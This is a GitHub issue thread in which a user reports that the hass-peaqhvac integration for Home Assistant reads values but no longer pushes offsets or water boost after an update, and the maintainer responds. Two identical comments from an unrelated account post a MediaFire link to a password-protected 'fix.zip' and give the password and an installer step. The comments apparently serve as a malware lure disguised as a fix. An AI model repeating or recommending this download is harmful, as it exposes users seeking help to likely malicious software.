### ISSUE TITLE
Offsets and water seems stopped working?

### ISSUE THREAD

**Issue by enoch85** [elden1337/hass-peaqhvac#124]
![Screenshot_2024-08-26-13-49-35-84](https://github.com/user-attachments/assets/bb81b4e8-0174-4dc6-a00a-8d1099788dfd)
![Screenshot_2024-08-26-13-50-06-69](https://github.com/user-attachments/assets/55fb583b-cf7f-4fa4-9790-57aea3d7f559)

Since the latest update it can read values, but not push anything... Did I do something wrong?

**Comment by enoch85** [comment]
![image](https://github.com/user-attachments/assets/1aaa4d37-1e0e-45bd-8d2d-b477de18243f)

**Comment by enoch85** [comment]
Also, the water recent boost was made by me (an automation) which kicks in as soon as the price is below 0.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elden1337** [comment]
I dont understand this one from the images. Should it have updated your offset? Isnt it warm enough outside for it to be at -10?

**Comment by elden1337** [comment]
![image](https://github.com/user-attachments/assets/efa3b8ab-04dc-4434-906e-56ac3ba292c3)

There we go. Now i also saw it.

**Comment by enoch85** [comment]
> I dont understand this one from the images. Should it have updated your offset? Isnt it warm enough outside for it to be at -10?

Water boost and offsets stopped working. The images are an effort to try to show my settings.
